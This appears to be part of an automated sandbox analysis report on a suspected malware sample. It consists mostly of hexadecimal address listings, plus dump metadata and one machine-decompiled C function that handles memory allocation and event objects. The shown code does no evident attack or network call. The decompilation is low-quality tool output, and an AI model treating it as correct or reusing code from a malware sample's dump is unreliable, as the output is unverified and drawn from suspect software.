                                                                                                                              0x1d7e9fb5
                                                                                                                              0x1d7e9fb7
                                                                                                                              0x1d7e9fba
                                                                                                                              0x1d7e9fc1
                                                                                                                              0x1d7e9fc2
                                                                                                                              0x1d7e9fc6
                                                                                                                              0x1d7e9fcc
                                                                                                                              0x1d7e9fd6
                                                                                                                              0x1d7e9fd6
                                                                                                                              0x1d7e9fce
                                                                                                                              0x1d7e9fce
                                                                                                                              0x1d7e9fce
                                                                                                                              0x1d7e9fd8
                                                                                                                              0x1d7e9fda
                                                                                                                              0x1d7ea004
                                                                                                                              0x1d7ea00d
                                                                                                                              0x1d7ea010
                                                                                                                              0x1d7ea012
                                                                                                                              0x1d7ea2f5
                                                                                                                              0x1d7ea2f7
                                                                                                                              0x1d7ea2fb
                                                                                                                              0x1d7ea30c
                                                                                                                              0x1d7ea2fd
                                                                                                                              0x1d7ea2fd
                                                                                                                              0x1d7ea2ff
                                                                                                                              0x1d7ea302
                                                                                                                              0x1d7ea304
                                                                                                                              0x1d7ea304
                                                                                                                              0x1d7ea304
                                                                                                                              0x1d7ea307
                                                                                                                              0x1d7ea307
                                                                                                                              0x1d7ea319
                                                                                                                              0x1d7ea31f
                                                                                                                              0x1d7ea324
                                                                                                                              0x1d7ea328
                                                                                                                              0x1d7ea32c
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea32c
                                                                                                                              0x1d7ea018
                                                                                                                              0x1d7ea01b
                                                                                                                              0x1d7ea01d
                                                                                                                              0x1d7ea02a
                                                                                                                              0x1d7ea02c
                                                                                                                              0x1d7ea034
                                                                                                                              0x1d7ea036
                                                                                                                              0x1d7ea039
                                                                                                                              0x1d7ea03b
                                                                                                                              0x1d7ea03e
                                                                                                                              0x1d7ea041
                                                                                                                              0x1d7ea1eb
                                                                                                                              0x1d7ea1ef
                                                                                                                              0x1d7ea200
                                                                                                                              0x1d7ea1f1
                                                                                                                              0x1d7ea1f1
                                                                                                                              0x1d7ea1f3
                                                                                                                              0x1d7ea1f6
                                                                                                                              0x1d7ea1f8
                                                                                                                              0x1d7ea1f8
                                                                                                                              0x1d7ea1f8
                                                                                                                              0x1d7ea1fb
                                                                                                                              0x1d7ea1fb
                                                                                                                              0x1d7ea20b
                                                                                                                              0x1d7ea20f
                                                                                                                              0x1d7ea214
                                                                                                                              0x1d7ea217
                                                                                                                              0x1d7ea21b
                                                                                                                              0x1d7ea21f
                                                                                                                              0x1d7ea234
                                                                                                                              0x1d7ea221
                                                                                                                              0x1d7ea221
                                                                                                                              0x1d7ea223
                                                                                                                              0x1d7ea226
                                                                                                                              0x1d7ea228
                                                                                                                              0x1d7ea228
                                                                                                                              0x1d7ea228
                                                                                                                              0x1d7ea22b
                                                                                                                              0x1d7ea22e
                                                                                                                              0x1d7ea22e
                                                                                                                              0x1d7ea237
                                                                                                                              0x1d7ea23a
                                                                                                                              0x1d7ea23d
                                                                                                                              0x1d7ea23f
                                                                                                                              0x1d7ea241
                                                                                                                              0x1d7ea241
                                                                                                                              0x1d7ea244
                                                                                                                              0x1d7ea247
                                                                                                                              0x1d7ea247
                                                                                                                              0x1d7ea24b
                                                                                                                              0x1d7ea260
                                                                                                                              0x1d7ea263
                                                                                                                              0x1d7ea24d
                                                                                                                              0x1d7ea24d
                                                                                                                              0x1d7ea24f
                                                                                                                              0x1d7ea252
                                                                                                                              0x1d7ea254
                                                                                                                              0x1d7ea254
                                                                                                                              0x1d7ea254
                                                                                                                              0x1d7ea257
                                                                                                                              0x1d7ea25b
                                                                                                                              0x1d7ea25b
                                                                                                                              0x1d7ea266
                                                                                                                              0x1d7ea268
                                                                                                                              0x1d7ea2a7
                                                                                                                              0x1d7ea2ad
                                                                                                                              0x1d7ea2b0
                                                                                                                              0x1d7ea2b7
                                                                                                                              0x1d7ea2bd
                                                                                                                              0x1d7ea2b9
                                                                                                                              0x1d7ea2b9
                                                                                                                              0x1d7ea2b9
                                                                                                                              0x1d7ea2c1
                                                                                                                              0x1d7ea26a
                                                                                                                              0x1d7ea26e
                                                                                                                              0x1d7ea276
                                                                                                                              0x1d7ea27c
                                                                                                                              0x1d7ea280
                                                                                                                              0x1d7ea287
                                                                                                                              0x1d7ea28e
                                                                                                                              0x1d7ea294
                                                                                                                              0x1d7ea290
                                                                                                                              0x1d7ea290
                                                                                                                              0x1d7ea290
                                                                                                                              0x1d7ea298
                                                                                                                              0x1d7ea29c
                                                                                                                              0x1d7ea2a1
                                                                                                                              0x1d7ea2a1
                                                                                                                              0x1d7ea2c5
                                                                                                                              0x1d7ea2c9
                                                                                                                              0x1d7ea2de
                                                                                                                              0x1d7ea2e1
                                                                                                                              0x1d7ea2cb
                                                                                                                              0x1d7ea2cb
                                                                                                                              0x1d7ea2cd
                                                                                                                              0x1d7ea2d0
                                                                                                                              0x1d7ea2d2
                                                                                                                              0x1d7ea2d2
                                                                                                                              0x1d7ea2d2
                                                                                                                              0x1d7ea2d5
                                                                                                                              0x1d7ea2d9
                                                                                                                              0x1d7ea2d9
                                                                                                                              0x1d7ea2ec
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea2ec
                                                                                                                              0x1d7ea047
                                                                                                                              0x1d7ea04a
                                                                                                                              0x1d7ea1d1
                                                                                                                              0x1d7ea1d6
                                                                                                                              0x1d7ea1db
                                                                                                                              0x1d7ea1df
                                                                                                                              0x1d7ea1e2
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea1e2
                                                                                                                              0x1d7ea050
                                                                                                                              0x1d7ea053
                                                                                                                              0x1d7ea07c
                                                                                                                              0x1d7ea07f
                                                                                                                              0x1d7ea081
                                                                                                                              0x1d7ea097
                                                                                                                              0x1d7ea083
                                                                                                                              0x1d7ea083
                                                                                                                              0x1d7ea085
                                                                                                                              0x1d7ea088
                                                                                                                              0x1d7ea08a
                                                                                                                              0x1d7ea08c
                                                                                                                              0x1d7ea08c
                                                                                                                              0x1d7ea08c
                                                                                                                              0x1d7ea08f
                                                                                                                              0x1d7ea092
                                                                                                                              0x1d7ea092
                                                                                                                              0x1d7ea09a
                                                                                                                              0x1d7ea09d
                                                                                                                              0x1d7ea0a0
                                                                                                                              0x1d7ea0ae
                                                                                                                              0x1d7ea0b1
                                                                                                                              0x1d7ea0c4
                                                                                                                              0x1d7ea0c6
                                                                                                                              0x1d7ea0d0
                                                                                                                              0x1d7ea0d2
                                                                                                                              0x1d7ea0fb
                                                                                                                              0x1d7ea0fd
                                                                                                                              0x1d7ea10e
                                                                                                                              0x1d7ea0ff
                                                                                                                              0x1d7ea0ff
                                                                                                                              0x1d7ea101
                                                                                                                              0x1d7ea104
                                                                                                                              0x1d7ea106
                                                                                                                              0x1d7ea106
                                                                                                                              0x1d7ea106
                                                                                                                              0x1d7ea109
                                                                                                                              0x1d7ea109
                                                                                                                              0x1d7ea0d4
                                                                                                                              0x1d7ea0e1
                                                                                                                              0x1d7ea0e3
                                                                                                                              0x1d7ea0e6
                                                                                                                              0x1d7ea0f1
                                                                                                                              0x1d7ea0f1
                                                                                                                              0x1d7ea0f3
                                                                                                                              0x1d7ea0e8
                                                                                                                              0x1d7ea0e8
                                                                                                                              0x1d7ea0e8
                                                                                                                              0x1d7ea0f5
                                                                                                                              0x1d7ea0f5
                                                                                                                              0x1d7ea117
                                                                                                                              0x1d7ea0c8
                                                                                                                              0x1d7ea0cb
                                                                                                                              0x1d7ea0cb
                                                                                                                              0x1d7ea0b3
                                                                                                                              0x1d7ea0b9
                                                                                                                              0x1d7ea0b9
                                                                                                                              0x1d7ea0a2
                                                                                                                              0x1d7ea0aa
                                                                                                                              0x1d7ea0aa
                                                                                                                              0x1d7ea126
                                                                                                                              0x1d7ea12c
                                                                                                                              0x1d7ea132
                                                                                                                              0x1d7ea136
                                                                                                                              0x1d7ea139
                                                                                                                              0x1d7ea13c
                                                                                                                              0x1d7ea14a
                                                                                                                              0x1d7ea14d
                                                                                                                              0x1d7ea160
                                                                                                                              0x1d7ea162
                                                                                                                              0x1d7ea16c
                                                                                                                              0x1d7ea16e
                                                                                                                              0x1d7ea197
                                                                                                                              0x1d7ea19b
                                                                                                                              0x1d7ea1ac
                                                                                                                              0x1d7ea19d
                                                                                                                              0x1d7ea19d
                                                                                                                              0x1d7ea19f
                                                                                                                              0x1d7ea1a2
                                                                                                                              0x1d7ea1a4
                                                                                                                              0x1d7ea1a4
                                                                                                                              0x1d7ea1a4
                                                                                                                              0x1d7ea1a7
                                                                                                                              0x1d7ea1a7
                                                                                                                              0x1d7ea170
                                                                                                                              0x1d7ea17d
                                                                                                                              0x1d7ea17f
                                                                                                                              0x1d7ea182
                                                                                                                              0x1d7ea18d
                                                                                                                              0x1d7ea18d
                                                                                                                              0x1d7ea18f
                                                                                                                              0x1d7ea184
                                                                                                                              0x1d7ea184
                                                                                                                              0x1d7ea184
                                                                                                                              0x1d7ea191
                                                                                                                              0x1d7ea191
                                                                                                                              0x1d7ea1b5
                                                                                                                              0x1d7ea164
                                                                                                                              0x1d7ea167
                                                                                                                              0x1d7ea167
                                                                                                                              0x1d7ea14f
                                                                                                                              0x1d7ea155
                                                                                                                              0x1d7ea155
                                                                                                                              0x1d7ea13e
                                                                                                                              0x1d7ea146
                                                                                                                              0x1d7ea146
                                                                                                                              0x1d7ea1b9
                                                                                                                              0x1d7ea1bf
                                                                                                                              0x1d7ea1c0
                                                                                                                              0x1d7ea1c3
                                                                                                                              0x1d7ea1c5
                                                                                                                              0x1d7ea1c7
                                                                                                                              0x1d7ea1c7
                                                                                                                              0x1d7ea1ca
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea1ca
                                                                                                                              0x1d7ea058
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea058
                                                                                                                              0x1d7ea02e
                                                                                                                              0x1d7ea025
                                                                                                                              0x1d7ea025
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea025
                                                                                                                              0x1d7ea022
                                                                                                                              0x1d7ea022
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9fdc
                                                                                                                              0x1d7e9fe1
                                                                                                                              0x1d7e9fe6
                                                                                                                              0x1d7e9fe8
                                                                                                                              0x1d7ea003
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea003
                                                                                                                              0x1d7e9fef
                                                                                                                              0x1d7e9ff3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9ff9
                                                                                                                              0x1d7e9ffb
                                                                                                                              0x1d7e9da6
                                                                                                                              0x1d7e9da6
                                                                                                                              0x1d7e9dac
                                                                                                                              0x1d7e9db6
                                                                                                                              0x1d7e9db6
                                                                                                                              0x1d7e9dae
                                                                                                                              0x1d7e9dae
                                                                                                                              0x1d7e9dae
                                                                                                                              0x1d7e9db8
                                                                                                                              0x1d7e9dba
                                                                                                                              0x1d7e9dd9
                                                                                                                              0x1d7e9dd9
                                                                                                                              0x1d7e9ddd
                                                                                                                              0x1d7e9ddf
                                                                                                                              0x1d7e9e5a
                                                                                                                              0x1d7e9e5d
                                                                                                                              0x1d7e9e61
                                                                                                                              0x1d7e9e72
                                                                                                                              0x1d7e9e63
                                                                                                                              0x1d7e9e63
                                                                                                                              0x1d7e9e65
                                                                                                                              0x1d7e9e68
                                                                                                                              0x1d7e9e6a
                                                                                                                              0x1d7e9e6a
                                                                                                                              0x1d7e9e6a
                                                                                                                              0x1d7e9e6d
                                                                                                                              0x1d7e9e6d
                                                                                                                              0x1d7e9e75
                                                                                                                              0x1d7e9e78
                                                                                                                              0x1d7e9e7a
                                                                                                                              0x1d7e9e94
                                                                                                                              0x1d7e9e7c
                                                                                                                              0x1d7e9e8c
                                                                                                                              0x1d7e9e8c
                                                                                                                              0x1d7e9e96
                                                                                                                              0x1d7e9e98
                                                                                                                              0x1d7ea335
                                                                                                                              0x1d7ea335
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9e9e
                                                                                                                              0x1d7e9e9e
                                                                                                                              0x1d7e9ea2
                                                                                                                              0x1d7e9f8b
                                                                                                                              0x1d7e9f8e
                                                                                                                              0x1d7e9f8e
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9f8e
                                                                                                                              0x1d7e9ea8
                                                                                                                              0x1d7e9eb0
                                                                                                                              0x1d7e9eb3
                                                                                                                              0x1d7e9f74
                                                                                                                              0x1d7e9f79
                                                                                                                              0x1d7e9f7d
                                                                                                                              0x1d7e9f7f
                                                                                                                              0x1d7e9f82
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9f82
                                                                                                                              0x1d7e9eb9
                                                                                                                              0x1d7e9ec2
                                                                                                                              0x1d7e9ec4
                                                                                                                              0x1d7e9ece
                                                                                                                              0x1d7e9ed0
                                                                                                                              0x1d7e9ed1
                                                                                                                              0x1d7e9ed1
                                                                                                                              0x1d7e9ed1
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9ed1
                                                                                                                              0x1d7e9ec8
                                                                                                                              0x1d7e9ecb
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9ecb
                                                                                                                              0x1d7e9e98
                                                                                                                              0x1d7e9de1
                                                                                                                              0x1d7e9de4
                                                                                                                              0x1d7e9de8
                                                                                                                              0x1d7e9df1
                                                                                                                              0x1d7e9df1
                                                                                                                              0x1d7e9df1
                                                                                                                              0x1d7e9df6
                                                                                                                              0x1d7e9df9
                                                                                                                              0x1d7e9e09
                                                                                                                              0x1d7e9e0c
                                                                                                                              0x1d7e9e0e
                                                                                                                              0x1d7e9e2b
                                                                                                                              0x1d7e9e10
                                                                                                                              0x1d7e9e1e
                                                                                                                              0x1d7e9e20
                                                                                                                              0x1d7e9e23
                                                                                                                              0x1d7e9e23
                                                                                                                              0x1d7e9e2d
                                                                                                                              0x1d7e9e2f
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9e35
                                                                                                                              0x1d7e9e35
                                                                                                                              0x1d7e9e38
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9e3a
                                                                                                                              0x1d7e9e3e
                                                                                                                              0x1d7e9e4f
                                                                                                                              0x1d7e9e40
                                                                                                                              0x1d7e9e40
                                                                                                                              0x1d7e9e42
                                                                                                                              0x1d7e9e45
                                                                                                                              0x1d7e9e47
                                                                                                                              0x1d7e9e47
                                                                                                                              0x1d7e9e47
                                                                                                                              0x1d7e9e4a
                                                                                                                              0x1d7e9e4a
                                                                                                                              0x1d7e9e52
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9e52
                                                                                                                              0x1d7e9dfb
                                                                                                                              0x1d7e9dfb
                                                                                                                              0x1d7e9dfe
                                                                                                                              0x1d7e9ee1
                                                                                                                              0x1d7e9ee1
                                                                                                                              0x1d7e9ee3
                                                                                                                              0x1d7ea05e
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea05e
                                                                                                                              0x1d7e9ee9
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9ee9
                                                                                                                              0x1d7e9dbc
                                                                                                                              0x1d7e9dc1
                                                                                                                              0x1d7e9dc6
                                                                                                                              0x1d7e9dc8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9dcf
                                                                                                                              0x1d7e9dd3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9dd3
                                                                                                                              0x1d7e9dba
                                                                                                                              0x1d7e9fda
                                                                                                                              0x1d7e9faf
                                                                                                                              0x1d7e9fa6
                                                                                                                              0x1d7e9fa6
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9fa6
                                                                                                                              0x1d7e9fa3
                                                                                                                              0x1d7e9fa3
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9fa3
                                                                                                                              0x1d7e9f05
                                                                                                                              0x1d7e9ed9
                                                                                                                              0x1d7e9edf
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9edf
                                                                                                                              0x1d7e9cdd
                                                                                                                              0x1d7e9cdf
                                                                                                                              0x1d7e9ce4
                                                                                                                              0x1d7e9ce6
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9ce8
                                                                                                                              0x1d7e9ce8
                                                                                                                              0x1d7ea33c
                                                                                                                              0x1d7ea33c
                                                                                                                              0x1d7ea341
                                                                                                                              0x1d7ea343
                                                                                                                              0x1d7ea355
                                                                                                                              0x1d7ea345
                                                                                                                              0x1d7ea34e
                                                                                                                              0x1d7ea34e
                                                                                                                              0x1d7ea35a
                                                                                                                              0x1d7ea35d
                                                                                                                              0x1d7ea35f
                                                                                                                              0x1d7ea365
                                                                                                                              0x1d7ea36c
                                                                                                                              0x1d7ea36e
                                                                                                                              0x1d7ea375
                                                                                                                              0x1d7ea379
                                                                                                                              0x1d7ea379
                                                                                                                              0x1d7ea375
                                                                                                                              0x1d7ea36c
                                                                                                                              0x00000000
                                                                                                                              0x1d7ea37e
                                                                                                                              0x1d7e9ce6

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 2db930425a371af0d420d7b8733c05994f3e30ab3ca9cb24f1ccd7b008ec235f
                                                                                                                              • Instruction ID: 57d6874f21805984edb69b44975fe80bc1a13a9d0788f18f2fd5895da56969a1
                                                                                                                              • Opcode Fuzzy Hash: 2db930425a371af0d420d7b8733c05994f3e30ab3ca9cb24f1ccd7b008ec235f
                                                                                                                              • Instruction Fuzzy Hash: 2122DE316046A18BDB15DF29C090373B7F1BF457A4F04C89AE996CF286E335E592CB62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C55E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 35%
                                                                                                                              			E1D7C55E0(void* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				void* _t84;
				signed char _t91;
				intOrPtr _t94;
				void* _t103;
				char* _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				char* _t136;
				intOrPtr _t141;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr _t151;
				void* _t159;
				void* _t160;
				intOrPtr* _t161;

				_t159 = _a4;
				_push(4);
				_push(0x3000);
				_push(_t159);
				_push(0);
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_push( &_v8);
				_push(0xffffffff);
				_t141 = E1D782B10();
				if(_t141 >= 0) {
					_t145 = 0xb;
					memcpy(_v8, _t159, _t145 << 2);
					_push(0);
					_push(0);
					_push(0);
					_push(0x1f0003);
					_push( &_v20);
					_t141 = E1D782E30();
					if(_t141 < 0) {
						goto L27;
					}
					_t160 = _a4;
					_t91 =  *(_t160 + 4);
					_t148 = _t91 & 0x00000002;
					if((_t91 & 0x00000008) != 0) {
						_t148 = _t148 | 0x00000004;
					}
					_t141 = E1D7C5870(_t148 | 0x00000001, 0, 0, 0,  &_v108);
					if(_t141 != 0) {
						if(_t141 != 0x129) {
							 *((intOrPtr*)(_t160 + 0x1c)) = 0;
							 *((intOrPtr*)(_t160 + 0x20)) = 0;
							 *((intOrPtr*)(_t160 + 0x24)) = 0;
							 *((intOrPtr*)(_t160 + 0x28)) = 0;
							_t94 =  *((intOrPtr*)(_t160 + 0x10));
							if(_t94 != 0) {
								_push(0);
								_push(_t94);
								E1D782A70();
							}
							goto L27;
						}
						_push(0);
						 *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) = 1;
						_push(_v16);
						E1D782A70();
						_push(_v16);
						E1D782A80();
						if(_v12 != 0) {
							_push(0);
							_push(0);
							_push(_v12);
							E1D7829D0();
							_push(_v12);
							E1D782A80();
						}
						_t161 =  *((intOrPtr*)(_v8 + 8));
						_t103 = _v8;
						if(_t161 == 0) {
							if(( *(_t103 + 4) & 0x00000004) == 0) {
								_push(0);
								_push(0xfffffffe);
								E1D784570();
							}
						} else {
							 *0x1d8391e0( *((intOrPtr*)(_t103 + 0xc)));
							 *_t161();
						}
						_push(0x8000);
						_v24 =  *_v8;
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						_t141 = E1D782B90();
						_push(_t141);
						_push(0xffffffff);
						L8:
						E1D782C70();
						goto L27;
					}
					_t151 = _v104;
					_push(2);
					 *((intOrPtr*)(_t160 + 0x20)) = _v100;
					_push(0);
					 *((intOrPtr*)(_t160 + 0x24)) = _v96;
					_push(0x1f0003);
					 *((intOrPtr*)(_t160 + 0x28)) = _v92;
					_push( &_v16);
					_push(_t151);
					_push(_v20);
					 *((intOrPtr*)(_t160 + 0x1c)) = _t151;
					_push(0xffffffff);
					if(E1D782D70() >= 0) {
						_push(0);
						_push(4);
						_t122 =  &_v16;
						_push(_t122);
						_push(_t122);
						_push(_v104);
						_t141 = E1D782D50();
						if(_t141 < 0) {
							goto L7;
						}
						_t124 =  *((intOrPtr*)(_t160 + 0x18));
						if(_t124 == 0) {
							L15:
							_push(_v104);
							E1D784160();
							_push(0);
							_push(0);
							_push(_v20);
							E1D7829D0();
							_t127 =  *((intOrPtr*)(_t160 + 0x10));
							_v28 = _t127;
							if(_t127 != 0) {
								_push(0);
								_t144 =  *((intOrPtr*)(_a4 + 0x14));
								_push(_t127);
								_t128 = E1D782A70();
								_push(0);
								_push(0);
								_push(_t144);
								_v32 = _t128;
								E1D7829D0();
								_push(_v104);
								E1D782A80();
								_push(_v100);
								E1D782A80();
								_push(_v28);
								E1D782A80();
								_push(_t144);
								E1D782A80();
								_t141 = _v32;
							}
							goto L27;
						}
						_push(2);
						_push(0);
						_push(0x1f0003);
						_push( &_v12);
						_push(_v104);
						_push(_t124);
						_push(0xffffffff);
						_t141 = E1D782D70();
						if(_t141 < 0) {
							goto L7;
						}
						if(( *(_t160 + 4) & 0x00000010) == 0) {
							_push( *((intOrPtr*)(_t160 + 0x18)));
							E1D782A80();
						}
						_push(0);
						_push(4);
						_t136 =  &_v12;
						_push(_t136);
						_push(_t136);
						_push(_v104);
						_t141 = E1D782D50();
						if(_t141 < 0) {
							goto L7;
						} else {
							goto L15;
						}
					}
					L7:
					_push(_t141);
					_push(_v104);
					goto L8;
				} else {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					L27:
					if(_v20 != 0) {
						_push(_v20);
						E1D782A80();
					}
					_t84 = _v8;
					if(_t84 != 0) {
						_v24 =  *_t84;
						_push(0x8000);
						_push( &_v24);
						_push( &_v8);
						_push(0xffffffff);
						E1D782B90();
					}
					return _t141;
				}
			}
































                                                                                                                              0x1d7c55ea
                                                                                                                              0x1d7c55f0
                                                                                                                              0x1d7c55f2
                                                                                                                              0x1d7c55f7
                                                                                                                              0x1d7c55f8
                                                                                                                              0x1d7c55f9
                                                                                                                              0x1d7c55fc
                                                                                                                              0x1d7c55ff
                                                                                                                              0x1d7c5602
                                                                                                                              0x1d7c5608
                                                                                                                              0x1d7c5609
                                                                                                                              0x1d7c5610
                                                                                                                              0x1d7c5614
                                                                                                                              0x1d7c562a
                                                                                                                              0x1d7c562b
                                                                                                                              0x1d7c5633
                                                                                                                              0x1d7c5634
                                                                                                                              0x1d7c5635
                                                                                                                              0x1d7c5636
                                                                                                                              0x1d7c563b
                                                                                                                              0x1d7c5641
                                                                                                                              0x1d7c5645
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c564b
                                                                                                                              0x1d7c564e
                                                                                                                              0x1d7c5653
                                                                                                                              0x1d7c5658
                                                                                                                              0x1d7c565a
                                                                                                                              0x1d7c565a
                                                                                                                              0x1d7c566d
                                                                                                                              0x1d7c5671
                                                                                                                              0x1d7c5783
                                                                                                                              0x1d7c5812
                                                                                                                              0x1d7c5815
                                                                                                                              0x1d7c5818
                                                                                                                              0x1d7c581b
                                                                                                                              0x1d7c581e
                                                                                                                              0x1d7c5823
                                                                                                                              0x1d7c5825
                                                                                                                              0x1d7c5826
                                                                                                                              0x1d7c5827
                                                                                                                              0x1d7c5827
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5823
                                                                                                                              0x1d7c578f
                                                                                                                              0x1d7c5793
                                                                                                                              0x1d7c579a
                                                                                                                              0x1d7c579b
                                                                                                                              0x1d7c57a3
                                                                                                                              0x1d7c57a4
                                                                                                                              0x1d7c57ac
                                                                                                                              0x1d7c57ae
                                                                                                                              0x1d7c57af
                                                                                                                              0x1d7c57b0
                                                                                                                              0x1d7c57b3
                                                                                                                              0x1d7c57b8
                                                                                                                              0x1d7c57bb
                                                                                                                              0x1d7c57bb
                                                                                                                              0x1d7c57c3
                                                                                                                              0x1d7c57c6
                                                                                                                              0x1d7c57cb
                                                                                                                              0x1d7c57e2
                                                                                                                              0x1d7c57e4
                                                                                                                              0x1d7c57e5
                                                                                                                              0x1d7c57e7
                                                                                                                              0x1d7c57e7
                                                                                                                              0x1d7c57cd
                                                                                                                              0x1d7c57d3
                                                                                                                              0x1d7c57d9
                                                                                                                              0x1d7c57d9
                                                                                                                              0x1d7c57ef
                                                                                                                              0x1d7c57f6
                                                                                                                              0x1d7c57fc
                                                                                                                              0x1d7c5800
                                                                                                                              0x1d7c5801
                                                                                                                              0x1d7c5808
                                                                                                                              0x1d7c580a
                                                                                                                              0x1d7c580b
                                                                                                                              0x1d7c56b0
                                                                                                                              0x1d7c56b0
                                                                                                                              0x00000000
                                                                                                                              0x1d7c56b0
                                                                                                                              0x1d7c567a
                                                                                                                              0x1d7c567d
                                                                                                                              0x1d7c567f
                                                                                                                              0x1d7c5685
                                                                                                                              0x1d7c5686
                                                                                                                              0x1d7c568c
                                                                                                                              0x1d7c5691
                                                                                                                              0x1d7c5697
                                                                                                                              0x1d7c5698
                                                                                                                              0x1d7c5699
                                                                                                                              0x1d7c569c
                                                                                                                              0x1d7c569f
                                                                                                                              0x1d7c56aa
                                                                                                                              0x1d7c56ba
                                                                                                                              0x1d7c56bb
                                                                                                                              0x1d7c56bd
                                                                                                                              0x1d7c56c0
                                                                                                                              0x1d7c56c1
                                                                                                                              0x1d7c56c2
                                                                                                                              0x1d7c56ca
                                                                                                                              0x1d7c56ce
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c56d0
                                                                                                                              0x1d7c56d5
                                                                                                                              0x1d7c571a
                                                                                                                              0x1d7c571a
                                                                                                                              0x1d7c571d
                                                                                                                              0x1d7c5722
                                                                                                                              0x1d7c5723
                                                                                                                              0x1d7c5724
                                                                                                                              0x1d7c5727
                                                                                                                              0x1d7c572c
                                                                                                                              0x1d7c572f
                                                                                                                              0x1d7c5734
                                                                                                                              0x1d7c5743
                                                                                                                              0x1d7c5745
                                                                                                                              0x1d7c5748
                                                                                                                              0x1d7c5749
                                                                                                                              0x1d7c574e
                                                                                                                              0x1d7c5750
                                                                                                                              0x1d7c5752
                                                                                                                              0x1d7c5753
                                                                                                                              0x1d7c5756
                                                                                                                              0x1d7c575b
                                                                                                                              0x1d7c575c
                                                                                                                              0x1d7c5761
                                                                                                                              0x1d7c5762
                                                                                                                              0x1d7c5767
                                                                                                                              0x1d7c576a
                                                                                                                              0x1d7c576f
                                                                                                                              0x1d7c5770
                                                                                                                              0x1d7c5775
                                                                                                                              0x1d7c5775
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5734
                                                                                                                              0x1d7c56d7
                                                                                                                              0x1d7c56d9
                                                                                                                              0x1d7c56da
                                                                                                                              0x1d7c56e2
                                                                                                                              0x1d7c56e3
                                                                                                                              0x1d7c56e6
                                                                                                                              0x1d7c56e7
                                                                                                                              0x1d7c56ee
                                                                                                                              0x1d7c56f2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c56f9
                                                                                                                              0x1d7c56fe
                                                                                                                              0x1d7c56ff
                                                                                                                              0x1d7c56ff
                                                                                                                              0x1d7c5704
                                                                                                                              0x1d7c5705
                                                                                                                              0x1d7c5707
                                                                                                                              0x1d7c570a
                                                                                                                              0x1d7c570b
                                                                                                                              0x1d7c570c
                                                                                                                              0x1d7c5714
                                                                                                                              0x1d7c5718
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5718
                                                                                                                              0x1d7c56ac
                                                                                                                              0x1d7c56ac
                                                                                                                              0x1d7c56ad
                                                                                                                              0x00000000
                                                                                                                              0x1d7c5616
                                                                                                                              0x1d7c561b
                                                                                                                              0x1d7c561c
                                                                                                                              0x1d7c561d
                                                                                                                              0x1d7c561e
                                                                                                                              0x1d7c582c
                                                                                                                              0x1d7c5830
                                                                                                                              0x1d7c5832
                                                                                                                              0x1d7c5835
                                                                                                                              0x1d7c5835
                                                                                                                              0x1d7c583a
                                                                                                                              0x1d7c583f
                                                                                                                              0x1d7c5843
                                                                                                                              0x1d7c5849
                                                                                                                              0x1d7c584e
                                                                                                                              0x1d7c5852
                                                                                                                              0x1d7c5853
                                                                                                                              0x1d7c5855
                                                                                                                              0x1d7c5855
                                                                                                                              0x1d7c5860
                                                                                                                              0x1d7c5860

